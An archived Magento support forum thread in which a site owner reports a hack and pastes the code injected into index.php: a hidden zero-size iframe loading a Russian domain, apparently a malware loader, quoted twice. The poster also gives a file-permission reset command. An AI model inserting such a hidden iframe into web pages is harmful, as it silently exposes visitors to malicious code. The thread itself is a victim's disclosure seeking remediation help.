Posting in the Magento forums has been disabled pending the implementation of a new and improved forum solution which should better serve the community.

For new questions please post at magento.stackexchange.com, the community-run support site for the Magento community. We will be providing updates on the new forum solution soon. For questions or concerns please email community@magento.com.

Magento Forum

I also got hacked. 
 
ibasket
Jr. Member
 
Avatar
Total Posts:  26
Joined:  2008-06-06
London
 

This is the code that was injected into /index.php.

Mage::run();<html><body><html><iframe width=0 height=0 marginwidth=0 marginheight=0 frameborder=0 src="http://akrosi.ru/stat/got.php?sid=2"></iframe></html></body></html>Mage::run();<html><body><html><iframe width=0 height=0 marginwidth=0 marginheight=0 frameborder=0 src="http://akrosi.ru/stat/got.php?sid=2"></iframe></html></body></html>

I’ve just ran the following in ssh to reset the permissions and changed the ftp and access details including admin.
find ./ -type d -exec chmod 755 {} \; && find ./ -type f -exec chmod 644 {} \;

** To you novices - be careful when running the above script. Make sure you’re in the magento root folder when executing the above. NOT SERVER ROOT**

Hope this fixes it.

Any further comments on security will help smile

Thanks

 
Magento Community Magento Community
Magento Community
Magento Community
 
mariaapee243
Jr. Member
 
Total Posts:  10
Joined:  2010-04-29
 

Hi
Nice code. There are many ways to do the same work ...so if its working properly than its okay, there is nothing to worry about

 
Magento Community Magento Community
Magento Community
Magento Community
 
yaozer
Jr. Member
 
Avatar
Total Posts:  27
Joined:  2009-10-12
Shanghai
 

just delete them and check.

ibasket - 23 April 2010 12:17 AM

This is the code that was injected into /index.php.

Mage::run();<html><body><html><iframe width=0 height=0 marginwidth=0 marginheight=0 frameborder=0 src="http://akrosi.ru/stat/got.php?sid=2"></iframe></html></body></html>Mage::run();<html><body><html><iframe width=0 height=0 marginwidth=0 marginheight=0 frameborder=0 src="http://akrosi.ru/stat/got.php?sid=2"></iframe></html></body></html>

I’ve just ran the following in ssh to reset the permissions and changed the ftp and access details including admin.
find ./ -type d -exec chmod 755 {} \; && find ./ -type f -exec chmod 644 {} \;

** To you novices - be careful when running the above script. Make sure you’re in the magento root folder when executing the above. NOT SERVER ROOT**

Hope this fixes it.

Any further comments on security will help smile

Thanks

 
Magento Community Magento Community
Magento Community
Magento Community
Magento Community
Magento Community
Back to top